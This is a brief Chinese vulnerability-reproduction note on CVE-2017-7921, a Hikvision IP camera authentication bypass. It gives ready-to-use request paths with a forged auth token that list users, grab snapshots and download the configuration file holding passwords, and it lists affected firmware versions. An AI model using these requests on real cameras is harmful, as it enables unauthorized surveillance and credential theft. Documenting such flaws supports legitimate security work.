作者-Beginner
0x01 CVE-2017-7921漏洞复现
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
0x02 漏洞复现:
利用Goby发现漏洞(CVE-2017-7921):
利用路径:/Security/users?auth=YWRtaW46MTEK
附:检索所有用户及其角色的列表
利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK
附:获取相机快照而不进行身份验证
利用路径:
/System/configurationFile?auth=YWRtaW46MTEK
附:下载摄像头配置账号密码文件
0x03 漏洞影响版本:
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
版本至5.4.0build160530版本;
DS-2CD2xx0F-ISeries5.2.0build140721
版本至5.4.0Build160401版本;
DS-2CD2xx2FWDSeries5.3.1build150410
版本至5.4.4Build161125版本;
DS-2CD4x2xFWDSeries5.2.0build140721
版本至5.4.0Build160414版本;
DS-2CD4xx5Series5.2.0build140721
版本至5.4.0Build160421版本;
DS-2DFxSeries5.2.0build140805
版本至5.4.5Build160928版本;
DS-2CD63xxSeries5.0.9build140305
版本至5.3.5Build160106版本
0x04 参考链接:
https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
https://www.seebug.org/vuldb/ssvid-96469